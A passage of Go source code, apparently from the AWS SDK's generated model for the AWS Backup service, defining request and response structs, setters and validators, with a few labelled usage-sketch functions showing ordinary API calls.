StatusMessage *string `type:"string"`
}
// String returns the string representation
func (s DescribeRestoreJobOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DescribeRestoreJobOutput) GoString() string {
return s.String()
}
// SetAccountId sets the AccountId field's value.
func (s *DescribeRestoreJobOutput) SetAccountId(v string) *DescribeRestoreJobOutput {
s.AccountId = &v
return s
}
// SetBackupSizeInBytes sets the BackupSizeInBytes field's value.
func (s *DescribeRestoreJobOutput) SetBackupSizeInBytes(v int64) *DescribeRestoreJobOutput {
s.BackupSizeInBytes = &v
return s
}
// SetCompletionDate sets the CompletionDate field's value.
func (s *DescribeRestoreJobOutput) SetCompletionDate(v time.Time) *DescribeRestoreJobOutput {
s.CompletionDate = &v
return s
}
// SetCreatedResourceArn sets the CreatedResourceArn field's value.
func (s *DescribeRestoreJobOutput) SetCreatedResourceArn(v string) *DescribeRestoreJobOutput {
s.CreatedResourceArn = &v
return s
}
// SetCreationDate sets the CreationDate field's value.
func (s *DescribeRestoreJobOutput) SetCreationDate(v time.Time) *DescribeRestoreJobOutput {
s.CreationDate = &v
return s
}
// SetExpectedCompletionTimeMinutes sets the ExpectedCompletionTimeMinutes field's value.
func (s *DescribeRestoreJobOutput) SetExpectedCompletionTimeMinutes(v int64) *DescribeRestoreJobOutput {
s.ExpectedCompletionTimeMinutes = &v
return s
}
// SetIamRoleArn sets the IamRoleArn field's value.
func (s *DescribeRestoreJobOutput) SetIamRoleArn(v string) *DescribeRestoreJobOutput {
s.IamRoleArn = &v
return s
}
// SetPercentDone sets the PercentDone field's value.
func (s *DescribeRestoreJobOutput) SetPercentDone(v string) *DescribeRestoreJobOutput {
s.PercentDone = &v
return s
}
// SetRecoveryPointArn sets the RecoveryPointArn field's value.
func (s *DescribeRestoreJobOutput) SetRecoveryPointArn(v string) *DescribeRestoreJobOutput {
s.RecoveryPointArn = &v
return s
}
// SetResourceType sets the ResourceType field's value.
func (s *DescribeRestoreJobOutput) SetResourceType(v string) *DescribeRestoreJobOutput {
s.ResourceType = &v
return s
}
// SetRestoreJobId sets the RestoreJobId field's value.
func (s *DescribeRestoreJobOutput) SetRestoreJobId(v string) *DescribeRestoreJobOutput {
s.RestoreJobId = &v
return s
}
// SetStatus sets the Status field's value.
func (s *DescribeRestoreJobOutput) SetStatus(v string) *DescribeRestoreJobOutput {
s.Status = &v
return s
}
// SetStatusMessage sets the StatusMessage field's value.
func (s *DescribeRestoreJobOutput) SetStatusMessage(v string) *DescribeRestoreJobOutput {
s.StatusMessage = &v
return s
}
type DisassociateRecoveryPointInput struct {
_ struct{} `type:"structure"`
// The unique name of an AWS Backup vault. Required.
//
// BackupVaultName is a required field
BackupVaultName *string `location:"uri" locationName:"backupVaultName" type:"string" required:"true"`
// An Amazon Resource Name (ARN) that uniquely identifies an AWS Backup recovery
// point. Required.
//
// RecoveryPointArn is a required field
RecoveryPointArn *string `location:"uri" locationName:"recoveryPointArn" type:"string" required:"true"`
}
// String returns the string representation
func (s DisassociateRecoveryPointInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DisassociateRecoveryPointInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *DisassociateRecoveryPointInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "DisassociateRecoveryPointInput"}
if s.BackupVaultName == nil {
invalidParams.Add(request.NewErrParamRequired("BackupVaultName"))
}
if s.BackupVaultName != nil && len(*s.BackupVaultName) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupVaultName", 1))
}
if s.RecoveryPointArn == nil {
invalidParams.Add(request.NewErrParamRequired("RecoveryPointArn"))
}
if s.RecoveryPointArn != nil && len(*s.RecoveryPointArn) < 1 {
invalidParams.Add(request.NewErrParamMinLen("RecoveryPointArn", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *DisassociateRecoveryPointInput) SetBackupVaultName(v string) *DisassociateRecoveryPointInput {
s.BackupVaultName = &v
return s
}
// SetRecoveryPointArn sets the RecoveryPointArn field's value.
func (s *DisassociateRecoveryPointInput) SetRecoveryPointArn(v string) *DisassociateRecoveryPointInput {
s.RecoveryPointArn = &v
return s
}
type DisassociateRecoveryPointOutput struct {
_ struct{} `type:"structure"`
}
// String returns the string representation
func (s DisassociateRecoveryPointOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DisassociateRecoveryPointOutput) GoString() string {
return s.String()
}
type ExportBackupPlanTemplateInput struct {
_ struct{} `type:"structure"`
// Uniquely identifies a backup plan.
//
// BackupPlanId is a required field
BackupPlanId *string `location:"uri" locationName:"backupPlanId" type:"string" required:"true"`
}
// String returns the string representation
func (s ExportBackupPlanTemplateInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ExportBackupPlanTemplateInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *ExportBackupPlanTemplateInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "ExportBackupPlanTemplateInput"}
if s.BackupPlanId == nil {
invalidParams.Add(request.NewErrParamRequired("BackupPlanId"))
}
if s.BackupPlanId != nil && len(*s.BackupPlanId) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupPlanId", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupPlanId sets the BackupPlanId field's value.
func (s *ExportBackupPlanTemplateInput) SetBackupPlanId(v string) *ExportBackupPlanTemplateInput {
s.BackupPlanId = &v
return s
}
type ExportBackupPlanTemplateOutput struct {
_ struct{} `type:"structure"`
// The body of a backup plan template in JSON format.
//
// This is a signed JSON document that cannot be modified before being passed
// to GetBackupPlanFromJSON.
BackupPlanTemplateJson *string `type:"string"`
}
// String returns the string representation
func (s ExportBackupPlanTemplateOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ExportBackupPlanTemplateOutput) GoString() string {
return s.String()
}
// SetBackupPlanTemplateJson sets the BackupPlanTemplateJson field's value.
func (s *ExportBackupPlanTemplateOutput) SetBackupPlanTemplateJson(v string) *ExportBackupPlanTemplateOutput {
s.BackupPlanTemplateJson = &v
return s
}
type GetBackupPlanFromJSONInput struct {
_ struct{} `type:"structure"`
// A customer-supplied backup plan document in JSON format.
//
// BackupPlanTemplateJson is a required field
BackupPlanTemplateJson *string `type:"string" required:"true"`
}
// String returns the string representation
func (s GetBackupPlanFromJSONInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s GetBackupPlanFromJSONInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *GetBackupPlanFromJSONInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "GetBackupPlanFromJSONInput"}
if s.BackupPlanTemplateJson == nil {
invalidParams.Add(request.NewErrParamRequired("BackupPlanTemplateJson"))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupPlanTemplateJson sets the BackupPlanTemplateJson field's value.
func (s *GetBackupPlanFromJSONInput) SetBackupPlanTemplateJson(v string) *GetBackupPlanFromJSONInput {
s.BackupPlanTemplateJson = &v
return s
}
type GetBackupPlanFromJSONOutput struct {
_ struct{} `type:"structure"`
// Specifies the body of a backup plan. Includes a BackupPlanName and one or
// more sets of Rules.
BackupPlan *Plan `type:"structure"`
}
// String returns the string representation
func (s GetBackupPlanFromJSONOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s GetBackupPlanFromJSONOutput) GoString() string {
return s.String()
}
// SetBackupPlan sets the BackupPlan field's value.
func (s *GetBackupPlanFromJSONOutput) SetBackupPlan(v *Plan) *GetBackupPlanFromJSONOutput {
s.BackupPlan = v
return s
}
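// exampleTemplateRoundTrip is a usage sketch, not generated API code. It
// illustrates the relationship documented above: ExportBackupPlanTemplate
// returns a signed JSON document, and that document must be passed unmodified
// to GetBackupPlanFromJSON to be parsed back into a Plan. The client value
// svc and the plan ID are assumptions for illustration.
func exampleTemplateRoundTrip(svc *Backup, backupPlanId string) (*Plan, error) {
	exported, err := svc.ExportBackupPlanTemplate(&ExportBackupPlanTemplateInput{
		BackupPlanId: aws.String(backupPlanId),
	})
	if err != nil {
		return nil, err
	}
	// Pass the signed template back without editing it, per the field's
	// documentation.
	parsed, err := svc.GetBackupPlanFromJSON(&GetBackupPlanFromJSONInput{
		BackupPlanTemplateJson: exported.BackupPlanTemplateJson,
	})
	if err != nil {
		return nil, err
	}
	return parsed.BackupPlan, nil
}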
type GetBackupPlanFromTemplateInput struct {
_ struct{} `type:"structure"`
// Uniquely identifies a stored backup plan template.
//
// BackupPlanTemplateId is a required field
BackupPlanTemplateId *string `location:"uri" locationName:"templateId" type:"string" required:"true"`
}
// String returns the string representation
func (s GetBackupPlanFromTemplateInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s GetBackupPlanFromTemplateInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *GetBackupPlanFromTemplateInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "GetBackupPlanFromTemplateInput"}
if s.BackupPlanTemplateId == nil {
invalidParams.Add(request.NewErrParamRequired("BackupPlanTemplateId"))
}
if s.BackupPlanTemplateId != nil && len(*s.BackupPlanTemplateId) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupPlanTemplateId", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupPlanTemplateId sets the BackupPlanTemplateId field's value.
func (s *GetBackupPlanFromTemplateInput) SetBackupPlanTemplateId(v string) *GetBackupPlanFromTemplateInput {
s.BackupPlanTemplateId = &v
return s
}
type GetBackupPlanFromTemplateOutput struct {
_ struct{} `type:"structure"`
// Returns the body of a backup plan based on the target template, including
// the name, rules, and backup vault of the plan.
BackupPlanDocument *Plan `type:"structure"`
}
// String returns the string representation
func (s GetBackupPlanFromTemplateOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s GetBackupPlanFromTemplateOutput) GoString() string {
return s.String()
}
// SetBackupPlanDocument sets the BackupPlanDocument field's value.
func (s *GetBackupPlanFromTemplateOutput) SetBackupPlanDocument(v *Plan) *GetBackupPlanFromTemplateOutput {
s.BackupPlanDocument = v
return s
}
type GetBackupPlanInput struct {
_ struct{} `type:"structure"`
// Uniquely identifies a backup plan.
//
// BackupPlanId is a required field
BackupPlanId *string `location:"uri" locationName:"backupPlanId" type:"string" required:"true"`
// Unique, randomly generated, Unicode, UTF-8 encoded strings that are at most
// 1,024 bytes long. Version IDs cannot be edited.
VersionId *string `location:"querystring" locationName:"versionId" type:"string"`
}
// String returns the string representation
func (s GetBackupPlanInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s GetBackupPlanInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *GetBackupPlanInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "GetBackupPlanInput"}
if s.BackupPlanId == nil {
invalidParams.Add(request.NewErrParamRequired("BackupPlanId"))
}
if s.BackupPlanId != nil && len(*s.BackupPlanId) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupPlanId", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupPlanId sets the BackupPlanId field's value.
func (s *GetBackupPlanInput) SetBackupPlanId(v string) *GetBackupPlanInput {
s.BackupPlanId = &v
return s
}
// SetVersionId sets the VersionId field's value.
func (s *GetBackupPlanInput) SetVersionId(v string) *GetBackupPlanInput {
s.VersionId = &v
return s
}
type GetBackupPlanOutput struct {
_ struct{} `type:"structure"`
// Contains a list of BackupOptions for each resource type. The list is populated
// only if the advanced option is set for the backup plan.
AdvancedBackupSettings []*AdvancedBackupSetting `type:"list"`
// Specifies the body of a backup plan. Includes a BackupPlanName and one or
// more sets of Rules.
BackupPlan *Plan `type:"structure"`
// An Amazon Resource Name (ARN) that uniquely identifies a backup plan; for
// example, arn:aws:backup:us-east-1:123456789012:plan:8F81F553-3A74-4A3F-B93D-B3360DC80C50.
BackupPlanArn *string `type:"string"`
// Uniquely identifies a backup plan.
BackupPlanId *string `type:"string"`
// The date and time that a backup plan is created, in Unix format and Coordinated
// Universal Time (UTC). The value of CreationDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
CreationDate *time.Time `type:"timestamp"`
// A unique string that identifies the request and allows failed requests to
// be retried without the risk of running the operation twice.
CreatorRequestId *string `type:"string"`
// The date and time that a backup plan is deleted, in Unix format and Coordinated
// Universal Time (UTC). The value of DeletionDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
DeletionDate *time.Time `type:"timestamp"`
// The last time a job to back up resources was run with this backup plan. A
// date and time, in Unix format and Coordinated Universal Time (UTC). The value
// of LastExecutionDate is accurate to milliseconds. For example, the value
// 1516925490.087 represents Friday, January 26, 2018 12:11:30.087 AM.
LastExecutionDate *time.Time `type:"timestamp"`
// Unique, randomly generated, Unicode, UTF-8 encoded strings that are at most
// 1,024 bytes long. Version IDs cannot be edited.
VersionId *string `type:"string"`
}
// String returns the string representation
func (s GetBackupPlanOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s GetBackupPlanOutput) GoString() string {
return s.String()
}
// SetAdvancedBackupSettings sets the AdvancedBackupSettings field's value.
func (s *GetBackupPlanOutput) SetAdvancedBackupSettings(v []*AdvancedBackupSetting) *GetBackupPlanOutput {
s.AdvancedBackupSettings = v
return s
}
// SetBackupPlan sets the BackupPlan field's value.
func (s *GetBackupPlanOutput) SetBackupPlan(v *Plan) *GetBackupPlanOutput {
s.BackupPlan = v
return s
}
// SetBackupPlanArn sets the BackupPlanArn field's value.
func (s *GetBackupPlanOutput) SetBackupPlanArn(v string) *GetBackupPlanOutput {
s.BackupPlanArn = &v
return s
}
// SetBackupPlanId sets the BackupPlanId field's value.
func (s *GetBackupPlanOutput) SetBackupPlanId(v string) *GetBackupPlanOutput {
s.BackupPlanId = &v
return s
}
// SetCreationDate sets the CreationDate field's value.
func (s *GetBackupPlanOutput) SetCreationDate(v time.Time) *GetBackupPlanOutput {
s.CreationDate = &v
return s
}
// SetCreatorRequestId sets the CreatorRequestId field's value.
func (s *GetBackupPlanOutput) SetCreatorRequestId(v string) *GetBackupPlanOutput {
s.CreatorRequestId = &v
return s
}
// SetDeletionDate sets the DeletionDate field's value.
func (s *GetBackupPlanOutput) SetDeletionDate(v time.Time) *GetBackupPlanOutput {
s.DeletionDate = &v
return s
}
// SetLastExecutionDate sets the LastExecutionDate field's value.
func (s *GetBackupPlanOutput) SetLastExecutionDate(v time.Time) *GetBackupPlanOutput {
s.LastExecutionDate = &v
return s
}
// SetVersionId sets the VersionId field's value.
func (s *GetBackupPlanOutput) SetVersionId(v string) *GetBackupPlanOutput {
s.VersionId = &v
return s
}
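// exampleGetBackupPlan is a usage sketch, not generated API code. It shows
// the optional VersionId querystring parameter: leave it unset to read the
// plan's current version, or set it to read a specific stored version, since
// version IDs cannot be edited. The client value svc and both IDs are
// assumptions for illustration.
func exampleGetBackupPlan(svc *Backup, planId, versionId string) (*GetBackupPlanOutput, error) {
	input := (&GetBackupPlanInput{}).SetBackupPlanId(planId)
	if versionId != "" {
		input.SetVersionId(versionId)
	}
	if err := input.Validate(); err != nil {
		return nil, err
	}
	return svc.GetBackupPlan(input)
}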
type GetBackupSelectionInput struct {
_ struct{} `type:"structure"`
// Uniquely identifies a backup plan.
//
// BackupPlanId is a required field
BackupPlanId *string `location:"uri" locationName:"backupPlanId" type:"string" required:"true"`
// Uniquely identifies the body of a request to assign a set of resources to
// a backup plan.
//
// SelectionId is a required field
SelectionId *string `location:"uri" locationName:"selectionId" type:"string" required:"true"`
}
// String returns the string representation
func (s GetBackupSelectionInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s GetBackupSelectionInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *GetBackupSelectionInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "GetBackupSelectionInput"}
if s.BackupPlanId == nil {
invalidParams.Add(request.NewErrParamRequired("BackupPlanId"))
}
if s.BackupPlanId != nil && len(*s.BackupPlanId) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupPlanId", 1))
}
if s.SelectionId == nil {
invalidParams.Add(request.NewErrParamRequired("SelectionId"))
}
if s.SelectionId != nil && len(*s.SelectionId) < 1 {
invalidParams.Add(request.NewErrParamMinLen("SelectionId", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupPlanId sets the BackupPlanId field's value.
func (s *GetBackupSelectionInput) SetBackupPlanId(v string) *GetBackupSelectionInput {
s.BackupPlanId = &v
return s
}
// SetSelectionId sets the SelectionId field's value.
func (s *GetBackupSelectionInput) SetSelectionId(v string) *GetBackupSelectionInput {
s.SelectionId = &v
return s
}
type GetBackupSelectionOutput struct {
_ struct{} `type:"structure"`
// Uniquely identifies a backup plan.
BackupPlanId *string `type:"string"`
// Specifies the body of a request to assign a set of resources to a backup
// plan.
BackupSelection *Selection `type:"structure"`
// The date and time a backup selection is created, in Unix format and Coordinated
// Universal Time (UTC). The value of CreationDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
CreationDate *time.Time `type:"timestamp"`
// A unique string that identifies the request and allows failed requests to
// be retried without the risk of running the operation twice.
CreatorRequestId *string `type:"string"`
// Uniquely identifies the body of a request to assign a set of resources to
// a backup plan.
SelectionId *string `type:"string"`
}
// String returns the string representation
func (s GetBackupSelectionOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s GetBackupSelectionOutput) GoString() string {
return s.String()
}
// SetBackupPlanId sets the BackupPlanId field's value.
func (s *GetBackupSelectionOutput) SetBackupPlanId(v string) *GetBackupSelectionOutput {
s.BackupPlanId = &v
return s
}
// SetBackupSelection sets the BackupSelection field's value.
func (s *GetBackupSelectionOutput) SetBackupSelection(v *Selection) *GetBackupSelectionOutput {
s.BackupSelection = v
return s
}
// SetCreationDate sets the CreationDate field's value.
func (s *GetBackupSelectionOutput) SetCreationDate(v time.Time) *GetBackupSelectionOutput {
s.CreationDate = &v
return s
}
// SetCreatorRequestId sets the CreatorRequestId field's value.
func (s *GetBackupSelectionOutput) SetCreatorRequestId(v string) *GetBackupSelectionOutput {
s.CreatorRequestId = &v
return s
}
// SetSelectionId sets the SelectionId field's value.
func (s *GetBackupSelectionOutput) SetSelectionId(v string) *GetBackupSelectionOutput {
s.SelectionId = &v
return s
}
type GetBackupVaultAccessPolicyInput struct {
_ struct{} `type:"structure"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
//
// BackupVaultName is a required field
BackupVaultName *string `location:"uri" locationName:"backupVaultName" type:"string" required:"true"`
}
// String returns the string representation
func (s GetBackupVaultAccessPolicyInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s GetBackupVaultAccessPolicyInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *GetBackupVaultAccessPolicyInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "GetBackupVaultAccessPolicyInput"}
if s.BackupVaultName == nil {
invalidParams.Add(request.NewErrParamRequired("BackupVaultName"))
}
if s.BackupVaultName != nil && len(*s.BackupVaultName) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupVaultName", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *GetBackupVaultAccessPolicyInput) SetBackupVaultName(v string) *GetBackupVaultAccessPolicyInput {
s.BackupVaultName = &v
return s
}
type GetBackupVaultAccessPolicyOutput struct {
_ struct{} `type:"structure"`
// An Amazon Resource Name (ARN) that uniquely identifies a backup vault; for
// example, arn:aws:backup:us-east-1:123456789012:vault:aBackupVault.
BackupVaultArn *string `type:"string"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the Region where they are created. They consist of lowercase letters, numbers,
// and hyphens.
BackupVaultName *string `type:"string"`
// The backup vault access policy document in JSON format.
Policy *string `type:"string"`
}
// String returns the string representation
func (s GetBackupVaultAccessPolicyOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s GetBackupVaultAccessPolicyOutput) GoString() string {
return s.String()
}
// SetBackupVaultArn sets the BackupVaultArn field's value.
func (s *GetBackupVaultAccessPolicyOutput) SetBackupVaultArn(v string) *GetBackupVaultAccessPolicyOutput {
s.BackupVaultArn = &v
return s
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *GetBackupVaultAccessPolicyOutput) SetBackupVaultName(v string) *GetBackupVaultAccessPolicyOutput {
s.BackupVaultName = &v
return s
}
// SetPolicy sets the Policy field's value.
func (s *GetBackupVaultAccessPolicyOutput) SetPolicy(v string) *GetBackupVaultAccessPolicyOutput {
s.Policy = &v
return s
}
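// exampleGetVaultPolicy is a usage sketch, not generated API code. It shows
// that the Policy field arrives as a JSON document serialized into a plain
// string, so callers typically hand it to their own JSON tooling; here it is
// only unwrapped and printed. The client value svc and the vault name are
// assumptions for illustration.
func exampleGetVaultPolicy(svc *Backup, vaultName string) error {
	out, err := svc.GetBackupVaultAccessPolicy(&GetBackupVaultAccessPolicyInput{
		BackupVaultName: aws.String(vaultName),
	})
	if err != nil {
		return err
	}
	// aws.StringValue safely dereferences the *string, returning "" for nil.
	fmt.Println(aws.StringValue(out.Policy))
	return nil
}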
type GetBackupVaultNotificationsInput struct {
_ struct{} `type:"structure"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
//
// BackupVaultName is a required field
BackupVaultName *string `location:"uri" locationName:"backupVaultName" type:"string" required:"true"`
}
// String returns the string representation
func (s GetBackupVaultNotificationsInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s GetBackupVaultNotificationsInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *GetBackupVaultNotificationsInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "GetBackupVaultNotificationsInput"}
if s.BackupVaultName == nil {
invalidParams.Add(request.NewErrParamRequired("BackupVaultName"))
}
if s.BackupVaultName != nil && len(*s.BackupVaultName) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupVaultName", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *GetBackupVaultNotificationsInput) SetBackupVaultName(v string) *GetBackupVaultNotificationsInput {
s.BackupVaultName = &v
return s
}
type GetBackupVaultNotificationsOutput struct {
_ struct{} `type:"structure"`
// An Amazon Resource Name (ARN) that uniquely identifies a backup vault; for
// example, arn:aws:backup:us-east-1:123456789012:vault:aBackupVault.
BackupVaultArn *string `type:"string"`
// An array of events that indicate the status of jobs to back up resources
// to the backup vault.
BackupVaultEvents []*string `type:"list"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the Region where they are created. They consist of lowercase letters, numbers,
// and hyphens.
BackupVaultName *string `type:"string"`
// An ARN that uniquely identifies an Amazon Simple Notification Service (Amazon
// SNS) topic; for example, arn:aws:sns:us-west-2:111122223333:MyTopic.
SNSTopicArn *string `type:"string"`
}
// String returns the string representation
func (s GetBackupVaultNotificationsOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s GetBackupVaultNotificationsOutput) GoString() string {
return s.String()
}
// SetBackupVaultArn sets the BackupVaultArn field's value.
func (s *GetBackupVaultNotificationsOutput) SetBackupVaultArn(v string) *GetBackupVaultNotificationsOutput {
s.BackupVaultArn = &v
return s
}
// SetBackupVaultEvents sets the BackupVaultEvents field's value.
func (s *GetBackupVaultNotificationsOutput) SetBackupVaultEvents(v []*string) *GetBackupVaultNotificationsOutput {
s.BackupVaultEvents = v
return s
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *GetBackupVaultNotificationsOutput) SetBackupVaultName(v string) *GetBackupVaultNotificationsOutput {
s.BackupVaultName = &v
return s
}
// SetSNSTopicArn sets the SNSTopicArn field's value.
func (s *GetBackupVaultNotificationsOutput) SetSNSTopicArn(v string) *GetBackupVaultNotificationsOutput {
s.SNSTopicArn = &v
return s
}
type GetRecoveryPointRestoreMetadataInput struct {
_ struct{} `type:"structure"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
//
// BackupVaultName is a required field
BackupVaultName *string `location:"uri" locationName:"backupVaultName" type:"string" required:"true"`
// An Amazon Resource Name (ARN) that uniquely identifies a recovery point;
// for example, arn:aws:backup:us-east-1:123456789012:recovery-point:1EB3B5E7-9EB0-435A-A80B-108B488B0D45.
//
// RecoveryPointArn is a required field
RecoveryPointArn *string `location:"uri" locationName:"recoveryPointArn" type:"string" required:"true"`
}
// String returns the string representation
func (s GetRecoveryPointRestoreMetadataInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s GetRecoveryPointRestoreMetadataInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *GetRecoveryPointRestoreMetadataInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "GetRecoveryPointRestoreMetadataInput"}
if s.BackupVaultName == nil {
invalidParams.Add(request.NewErrParamRequired("BackupVaultName"))
}
if s.BackupVaultName != nil && len(*s.BackupVaultName) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupVaultName", 1))
}
if s.RecoveryPointArn == nil {
invalidParams.Add(request.NewErrParamRequired("RecoveryPointArn"))
}
if s.RecoveryPointArn != nil && len(*s.RecoveryPointArn) < 1 {
invalidParams.Add(request.NewErrParamMinLen("RecoveryPointArn", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *GetRecoveryPointRestoreMetadataInput) SetBackupVaultName(v string) *GetRecoveryPointRestoreMetadataInput {
s.BackupVaultName = &v
return s
}
// SetRecoveryPointArn sets the RecoveryPointArn field's value.
func (s *GetRecoveryPointRestoreMetadataInput) SetRecoveryPointArn(v string) *GetRecoveryPointRestoreMetadataInput {
s.RecoveryPointArn = &v
return s
}
type GetRecoveryPointRestoreMetadataOutput struct {
_ struct{} `type:"structure"`
// An ARN that uniquely identifies a backup vault; for example, arn:aws:backup:us-east-1:123456789012:vault:aBackupVault.
BackupVaultArn *string `type:"string"`
// An ARN that uniquely identifies a recovery point; for example, arn:aws:backup:us-east-1:123456789012:recovery-point:1EB3B5E7-9EB0-435A-A80B-108B488B0D45.
RecoveryPointArn *string `type:"string"`
// The set of metadata key-value pairs that describe the original configuration
// of the backed-up resource. These values vary depending on the service that
// is being restored.
RestoreMetadata map[string]*string `type:"map" sensitive:"true"`
}
// String returns the string representation
func (s GetRecoveryPointRestoreMetadataOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s GetRecoveryPointRestoreMetadataOutput) GoString() string {
return s.String()
}
// SetBackupVaultArn sets the BackupVaultArn field's value.
func (s *GetRecoveryPointRestoreMetadataOutput) SetBackupVaultArn(v string) *GetRecoveryPointRestoreMetadataOutput {
s.BackupVaultArn = &v
return s
}
// SetRecoveryPointArn sets the RecoveryPointArn field's value.
func (s *GetRecoveryPointRestoreMetadataOutput) SetRecoveryPointArn(v string) *GetRecoveryPointRestoreMetadataOutput {
s.RecoveryPointArn = &v
return s
}
// SetRestoreMetadata sets the RestoreMetadata field's value.
func (s *GetRecoveryPointRestoreMetadataOutput) SetRestoreMetadata(v map[string]*string) *GetRecoveryPointRestoreMetadataOutput {
s.RestoreMetadata = v
return s
}
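// exampleRestoreMetadata is a usage sketch, not generated API code. It shows
// the typical use of GetRecoveryPointRestoreMetadata: the returned map
// captures the backed-up resource's original configuration and is usually
// used to seed a subsequent restore request. The map is copied here rather
// than passed on, to keep the sketch self-contained; svc and the identifiers
// are assumptions for illustration.
func exampleRestoreMetadata(svc *Backup, vaultName, recoveryPointArn string) (map[string]*string, error) {
	out, err := svc.GetRecoveryPointRestoreMetadata(&GetRecoveryPointRestoreMetadataInput{
		BackupVaultName:  aws.String(vaultName),
		RecoveryPointArn: aws.String(recoveryPointArn),
	})
	if err != nil {
		return nil, err
	}
	// The field is tagged sensitive:"true", so avoid logging these values.
	metadata := make(map[string]*string, len(out.RestoreMetadata))
	for k, v := range out.RestoreMetadata {
		metadata[k] = v
	}
	return metadata, nil
}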
type GetSupportedResourceTypesInput struct {
_ struct{} `type:"structure"`
}
// String returns the string representation
func (s GetSupportedResourceTypesInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s GetSupportedResourceTypesInput) GoString() string {
return s.String()
}
type GetSupportedResourceTypesOutput struct {
_ struct{} `type:"structure"`
// Contains a list of the supported AWS resource types:
//
// * DynamoDB for Amazon DynamoDB
//
// * EBS for Amazon Elastic Block Store
//
// * EC2 for Amazon Elastic Compute Cloud
//
// * EFS for Amazon Elastic File System
//
// * RDS for Amazon Relational Database Service
//
// * Aurora for Amazon Aurora
//
// * Storage Gateway for AWS Storage Gateway
ResourceTypes []*string `type:"list"`
}
// String returns the string representation
func (s GetSupportedResourceTypesOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s GetSupportedResourceTypesOutput) GoString() string {
return s.String()
}
